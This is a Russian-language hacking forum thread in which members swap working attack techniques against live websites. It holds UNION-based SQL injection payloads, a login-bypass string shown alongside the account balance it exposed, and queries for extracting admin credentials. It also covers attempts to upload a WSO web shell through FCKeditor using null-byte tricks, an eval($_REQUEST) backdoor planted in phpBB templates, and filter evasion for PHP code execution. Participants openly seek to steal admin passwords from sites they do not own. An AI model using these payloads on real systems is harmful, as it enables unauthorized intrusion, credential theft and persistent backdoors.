Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,792
    Likes Received:
    877
    Reputations:
    859
    Выдержка со RDOT'а

    В limit, offset
    (в запросе не должен присутствовать order by)

    script.php?par=1,111111111 union select version(),2,3,4--
    script.php?par=111111111 union select version(),2,3,4--
     
    _________________________
  2. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    сорь, может не в тему но, слили БД сайта, админку найти не могу, в БД таюлици имеют префикс xpanel - в гугле ничего не могу найти про этот двиг, офф сайт уже давно в оффе, может кто что знает про етот двиг? где там админку можно найти?
     
  3. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    logsecurecash=1&login_name=' or 1#&login_pass=111111&x=31&y=13

    Вы зашли как: advaweb
    Баланс: 10 руб.
     
  4. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    Стыдно, спасибо :)
     
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,792
    Likes Received:
    877
    Reputations:
    859
    Потому что скобку забыл в запросе

    (select top 1 cast(name as nvarchar)+char(0x7a)+cast(lastname as nvarchar)+char(0x7а)+cast(email as nvarchar) from member where id=4)--
     
    _________________________
  6. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    265
    Likes Received:
    89
    Reputations:
    1
    Подскажите по поводу FCKeditor 2.5.1 Build 17566
    txt файлы спокойно льются, а вот php никак нехочет пробывал:
    1) Через /php/upload.php?Type=Media
    2) Грузил txt указывал в Current Folder: wso.php%00
    3) Пробывал %00 в url-decode, так же пробывал wso2.php%00.txt
    Что посоветуете? других дыр нет есть еще CKEditor 3.2.1
    Двиг: Powered by cc Engine (китайский двиг)
    P.S>.htaccess так же не грузит
     
  7. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    463
    Likes Received:
    62
    Reputations:
    26
    Подскажите в чем может быть проблема
    Сообственно пытаюсь лить шелл через админку phpbb 3 через стили
    Включаю выполнение php кода в шаблонах, иду в шаблоны faq_body.html
    впиливаю код <?php eval(stripslashes($_REQUEST[c])); ?>
    Иду в forum.com/faq.php?c=phpinfo(); пхпинфо не выводится = \
    Подскажите почему может не выполнятся пхпкод
    права в админке полные, мб можно еще какнить залить?
     
  8. panfilov1991

    panfilov1991 New Member

    Joined:
    22 Jan 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    пытаюсь отправить запросы для вывода данных хотя бы юзеров.
    то и дело выходят ошибки :
    Подскажите где взять список запросов?
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    884
    Reputations:
    859
    а какой запрос вы делайте? покажите.
     
    _________________________
  10. panfilov1991

    panfilov1991 New Member

    Joined:
    22 Jan 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    ошибка :

    Как можно вывести названия таблиц?
    Очень надо вывести логин и пасс админа
     
  11. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    884
    Reputations:
    859
    там где значение 0x41646D696E это Admin, вам бы мануалы по mysql почитать!
     
    _________________________
  12. panfilov1991

    panfilov1991 New Member

    Joined:
    22 Jan 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Мне реально стыдно! я уже их перечитался!
    мне бы пароль админа содрать, или таблицы вывести с БД
     
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    так вставляй
    PHP:
    <!-- PHP --> phpinfo(); <!-- ENDPHP -->


    так а в чём собственно проблема?
     
  14. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    463
    Likes Received:
    62
    Reputations:
    26
    ни какого эффекта) ничего не выводит = \
    я уже пробовал так)
     
  15. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Тебе бы тоже хоть что нибудь почитать, вместо того что бы советы давать.
     
  16. m00c0w

    m00c0w Banned

    Joined:
    25 Dec 2011
    Messages:
    104
    Likes Received:
    14
    Reputations:
    5
    он ему запрос дал и посоветовал мускуль подучить, чтоб он сам смог вывести таблицы, а ты тупо "умничаешь."
     
  17. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    Делаю такой запрос
    1+UnIon+selECt+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42&x=-392&y=-378 true

    1+UnIon+selECt+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+INFORMATION_SCHEMA.TABLES+--+&x=-392&y=-378 false

    Выдает
    Illegal mix of collations for operation 'UNION'

    Как быть?
     
  18. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Если не ошибаюсь, то такая ошибка обычно связана с проблемами в кодировке. И, судя по всему, в ошибке в вашем случае явно не указана нужная. Если ошибаюсь то меня поправят.

    Немного пищи для размышления:

    cast(version()+as+binary)
    convert(version(),binary)
    convert(version()+using+latin1)
    convert(version()+using+binary)
    aes_decrypt(aes_encrypt(version(),1),1)
    unhex(hex(version()))

    Попробуйте при выводе нужной информации использовать приведенные выше примеры.
     
    1 person likes this.
  19. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    176
    Likes Received:
    11
    Reputations:
    1
    ребят,хелп ми,плз

    есть уязвимость 'PHP Code execution'...выполняются phpinfo(),system(ls) и т.д.....слэшируются кавычки,хотя MQ=Off...всё бы ничего,можно было бы обойти c помощью base64,либо system($_GET[a])...но режутся заглавные....

    что можно сделать в данном случае?
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    print(`я консольная команда`);
     
    _________________________
Loading...
Thread Status:
Not open for further replies.